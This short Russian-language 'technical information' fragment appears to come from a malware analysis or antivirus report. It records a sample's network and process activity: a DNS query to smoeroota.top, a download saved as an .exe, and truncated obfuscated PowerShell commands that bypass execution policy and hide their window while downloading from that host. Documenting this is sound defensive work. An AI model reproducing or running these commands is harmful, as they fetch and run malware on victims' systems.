Техническая информация
- http://smoeroota.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^o^we^rsHELL.^exE ^-E^xEcuTI^oNP^olIC^y ByPASS -NOPR^oFiLE^ -^wIN^D^OwS^T^yLE^ hId^den ^(^NEW-o^B^J^ECt s^ys^t^Em.^nEt.w^eBcl^ieN^t^).^DOw^Nloa^dfiL^e^('http://smoeroota.t...
- DNS ASK sm###oota.top
- '<SYSTEM32>\cmd.exe' /c "P^o^we^rsHELL.^exE ^-E^xEcuTI^oNP^olIC^y ByPASS -NOPR^oFiLE^ -^wIN^D^OwS^T^yLE^ hId^den ^(^NEW-o^B^J^ECt s^ys^t^Em.^nEt.w^eBcl^ieN^t^).^DOw^Nloa^dfiL^e^('http://smoeroota.t...' (со скрытым окном)